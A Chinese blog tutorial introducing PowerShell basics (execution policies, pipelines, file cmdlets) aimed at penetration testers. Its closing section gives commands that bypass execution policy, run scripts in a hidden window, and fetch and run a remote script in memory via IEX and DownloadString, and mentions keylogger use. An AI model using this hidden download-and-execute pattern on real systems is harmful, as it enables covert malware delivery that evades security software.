PowerShell入门学习

最新推荐文章于 2024-05-23 17:11:05 发布
最新推荐文章于 2024-05-23 17:11:05 发布
阅读量1.0k 收藏 5
点赞数 2
分类专栏: 信息安全 文章标签: linux shell 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44420143/article/details/118762083
版权
本文介绍了PowerShell的强大功能,包括其在Windows系统中的默认安装、内存执行特性、执行策略管理、脚本运行、管道操作及常用命令,重点讲解了如何绕过权限执行和安全策略。适合黑客和系统管理员了解和实践。
摘要由CSDN通过智能技术生成

公粽号:黒掌

一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主!

PowerShell简介

PowerShell是一种命令行外壳程序和脚本环境,它置于Windows7/Windows Server2008 R2及以上更高的版本中。它可以执行Linux系统下的一些命令,这是非常强大的一点。它的脚本后缀为(.ps1),可在磁盘中执行,也可无需写入磁盘直接在内存中运行。

PowerShell的优点

1、Windows7以上的操作系统默认安装。

2、PowerShell脚本可以运行在内存中,不需要写入磁盘。

3、可以从另一个系统中下载PowerShell脚本并执行。

4、目前很多工具都是基于PowerShell开发的。

5、很多安全软件并不能检测到PowerShell的活动。

6、cmd.exe通常会被阻止运行,但是PowerShell不会。

7、可以用来管理活动目录。

使用命令查看PowerShell版本:

Get-Host`或者`$PSVersionTable.PSVERSION

经测试,PowerShell不区分大小写:

image-20210715141828161

PowerShell的基本概念

PS1文件

PowerShell脚本就是一个简单的脚本文件,包含了一系列的PowerShell命令,每个命令显示为独立的一行。PS脚本文件的后缀为(.ps1)。

执行策略

为了防止恶意脚本的执行,PowerShell有一个执行策略,默认情况下,执行策略被设为受限。

使用命令确定当前的执行策略:

Get-ExecutionPolicy

image-20210715141846261

因为之前我在本机上没有执行过PowerShell的任何脚本,所以PS的执行策略为默认设置即受限(Restricted)。

PowerShell具有四种执行策略分别为:

1、Restricted:脚本不能运行(默认设置)。

2、RemoteSigned:本地创建的脚本可运行,网上下载的带数字证书签名的脚本可运行。

3、AllSigned:仅当脚本由受信任的发布者签名时才能运行。

4、Unrestricted:允许所有的脚本运行。

使用命令设置PowerShell的执行策略:

Set-ExecutionPolicy <policy name>

将执行策略设置为允许所有脚本运行:

Set-ExecutionPolicy Unrestricted

image-20210715141859515

第一次执行爆红了,提示我们需要以管理员身份运行PowerShell,所以修改执行策略的时候需要管理员身份。

image-20210715141914245以管理员的身份进行修改就ok了。

再次查看执行策略,策略被修改:

image-20210715141928039

运行脚本

运行PS脚本,必须键入完整的路径和文件名,例如C:\Scripts\a.ps1

若此PS脚本恰好在刚好位于当前处在的目录中,可以直接在脚本名前加.\以运行脚本,例如.\a.ps1

管道

管道的作用是将一个命令的输出作为另一个命令的输入,以符号|连接。

get-process p*的意思是获取以”p”字符开头的程序

image-20210715141957679

get-process p* | stop-process则是关掉以”p”字符开头的程序。

PowerShell常用命令

基本知识

PS的命令都采用”动词+名词”的形式。

关于文件操作的命令:

1、新建目录:md test1

——MD函数,它内部调用的是New-Item命令,指定参数–type的值为Directory

new-item test2.txt -type directory

2、新建文件

new-item test.txt -type file

3、删除目录

remove-item test1

4、显示文本的内容

get-content test.txt

5、设置文本的内容

set-content test.txt -value "again Hello World!"

在这里看出,如果本来文件中有内容,但使用此命令,原来的内容就会消失,等于重置。

6、追加内容

add-content test.txt -value "今天是情人节!"

可以看到追加的内容,追加在下一行。

7、清除内容

clear-content test.txt

可以看到内容被清除。

常用命令

1、绕过本地权限执行

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

2、本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -Nonlnteractive -NoProfile -File xxx.ps1

3、用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden-NoProfile-NonI IEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

ExecutionPolicy Bypass绕过执行安全策略

WindowStyle Hidden隐藏窗口

NoProfilePowerShell控制台不加载当前用户的配置文件

NolLogo启动不显示版权标志的PowerShell

Nonlnteractive非交互模式,PowerShell不为用户提供交互的提示

Noexit执行后不退出shell(常用于键盘记录)
活码3D(缩小)

今天的分享就到这里,喜欢的小伙伴记得点赞收藏转发,我有一个公粽号【黒掌】, 里面分享了更多黑客秘籍,欢迎来耍!

是叶十三
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PowerShell 与 Command 编辑Windows环境变量
♡ 脚下的每一步都叫远方 ♡
03-05 322
文章目录 win下编辑环境变量很简单, 它有完善的图形界面, 我们直接进入高级系统设置里编辑即可 图形界面是方便了, 但是对应操作的效率就低了 现在, 记录下直接命令解决的方法 作用 PowerShell Command 查看环境变量 $env: 或者 ls env: 加变量名则是查看单个 set 加变量名如path 永久修改系统环境变量 setx Path “%Paht%;%...
powershell 命令_具有示例的Powershell启动过程命令教程
cunjiu9486的博客
10-09 2708
powershell 命令Start-Processis a powershell commandlet used create new process. As powershell is mainly developed .Net and provides .Net feature Start-Processis equivalent of System.Diagnostics.Proces...
PowerShell基础教程(19)——处理软件安装
图灵教育官方博客
03-22 463
PowerShell基础教程(19)——处理软件安装             &lt;o:p&gt;&lt;/o:p&gt; 通过 WMI 的 Win32_Product 类可以访问正确设计以使用 Windows Installer 的应用程序,但是并非目前使用的所有应用程序都使用 Windows Installer。由于 Windows Installer 为处理可安装的应用程序提供了范围最...
15|PowerShell脚本:如何实现文件批量处理的自动化?
最新发布
qq_37756660的博客
05-23 1672
PowerShell 是开源的终端命令解释器,之所以被称作解释器,是因为它会把用户输入的命令翻译给操作系统去执行,也能把操作系统执行的结果返回给用户。作为 PowerShell 的初学者,你刚开始理解起来会有点难度,不过别担心,举个例子就明白了。比如,在商场中的娃娃机,你需要通过对摇杆的控制来移动爪子的位置,抓取想要的礼物,因为你自己是没法直接移动爪子的。那么把你移动摇杆的操作翻译成爪子移动操作的功能,这就是解释器。
Powershell 】(Windows下)常用命令 | 命令别名 | 运行Windows命令行工具 | 运行用户程序(vim、gcc、gdb)
热门推荐
满堂花醉三千客,一剑霜寒十四州
08-13 1万+
Windows下使用Powershell
PowerShell 杂记(二)---Commandlet基本概念
知识的天空
09-26 1754
 一个WPS命令称为commandlet(cmdlet)或function。它有三个部分:1. 动词 2. 名词 3. 参数列表(可选)构成Verb-Norn [-parameter list]形式,如Get-Process参数可以多个。下面三个命令是一样的。Get-ChildItem C:/temp *.doc   (但不能写成Get-ChildItem *.doc C:/temp)Get-Ch
PowerShell的脚本和命令讲解
weixin_49668551的博客
10-20 7720
还要注意,-LogName参数的语法列为[-LogName],这里缺少小方括号,意味着对于-LogName参数只能有一个值。圆括号命令的作用就是首先执行括号中的的操作,结果将作为传递给参数的值。包括字符串在内的整个参数都是可选的,因为整个参数都是用方括号括起来的。内部有一个小方括号,看到以这种方式显示的两个方括号时,这意味着可使用逗号分隔的列表传递多个值。if语句查看变量$file路径是否有现在的路径文件,如果没有,它就在变量$file的路径下创建一个新的文件。
PowerShell 入门基础教程
01-20
Windows PowerShell 是专为系统管理员设计的新 Windows 命令行外壳程序。该外壳程序包括交互式提示和脚本环境,两者既可以独立使用也可以组合使用。 现在win2008,win7都集成了PowerShell,系统不带PowerShell可以...
一个月powershell入门学习
10-23
一个月powershell入门学习,快速入门手册,快速上手。
PowerShell入门教程之快速学习PowerShell的几个方法
01-10
如何快速地掌握PowerShell呢?总的来说,就是要尽可能多的使用它,就像那句谚语说的:Practice makes perfect。当然这里还有一些原则和方法让我们可以遵循。 有效利用交互式环境  一般来说,PowerShell有两个主要的...
《精通windows powershell 脚本编程》脚本资源安装文件
11-21
《精通windows powershell 脚本编程》脚本资源安装文件,运行该程序可以将书上的样例脚本文件安装到本地硬盘的一个文件夹里边。
PowerShell基础教程.doc
11-27
通过学习PowerShell基础教程,用户能够掌握如何利用其强大的对象模型和Cmdlet来自动化日常管理任务,提高工作效率。无论你是系统管理员还是开发者,PowerShell都是提升Windows环境管理能力不可或缺的工具。
Powershell commands详解之Function "add-content/ac"
TADICAN的专栏
01-18 3026
add-content, alias 为ac帮助:  可以通过get-help add-content, help ac, 或者help ac -full来得到帮助。用法:  add-content , path 为你需要写入内容的目的文件,如"c:/new.txt", content 为你要写入的内容。用途:  向指定文件写入内容。例子 1:  add-cont
POWERSHELL 脚本
lihongtao8209的专栏
10-30 473
一、其本知识 1.类的声明 $obj=New-Object PSObject -Property @{ a=""; b=@(); #数组 c=@{} #字典 } 2.类变量赋值 3.查看类数据数据结构 4.非类方法的声明、调用 声明 ...
PowerShell入门
学习 记录 总结 分享
12-24 835
PowerShel特点 Windows PowerShell 入门主要面向之前没有 Windows PowerShell 背景知识的 IT 专业人员、程序员和高级用户。虽然具备脚本和 WMI 方面的背景知识会有所帮助,但是理解本文档并不假定或要求您具备此方面知识。 (1)、powershell功能更加强大可以说分分钟钟秒杀linux的bash,更别说饱受诟病的 cmd; (2)、powershell 背后依靠的是一套完整的 .NET 编程体系,其脚本更容易编写且稳健性大大提升。反过来看 cmd,那些完全由各
PowerShell脚本学习
FuWen_Hao的博客
07-19 1万+
运行Bamboo的时候,有script需要用到PowerShell,记录一下学习过程。
如何使用powershell静默安装exe
weixin_44611254的博客
06-06 4065
公司一款vpn软件,无对应product code 信息,不支持msi安装,让写一个迭代产品的powershell脚本,方便大家更新(注:此两款所属不同产品,所以没办法推送迭代),有安装包放至共享的目录下,且是exe格式。许多(但也许不是全部)有静默安装的方法,但它们都不同,有时需要某种无人值守的安装脚本。
Windows Powershell命令一条命令安装Python
Linux I Tell U
09-08 5866
以往安装Python总需要先从官方下载安装包,启动安装程序再设置环境变量,虽然说官方的安装包已经变得越来越人性化越来越简单了,勾选需要的选项一路下一步就能完成安装。秉承着追求极致的方式,总算实现了在windows中只通过一句命令来完成Python的下载安装及配置。
Windows PowerShell入门与基础操作
"Windows PowerShell入门指南" Windows PowerShell是由微软开发的一种强大的命令行外壳程序和脚本环境,特别针对系统管理员设计,以提升管理和自动化Windows操作系统任务的效率。它于2006年发布,旨在克服传统命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值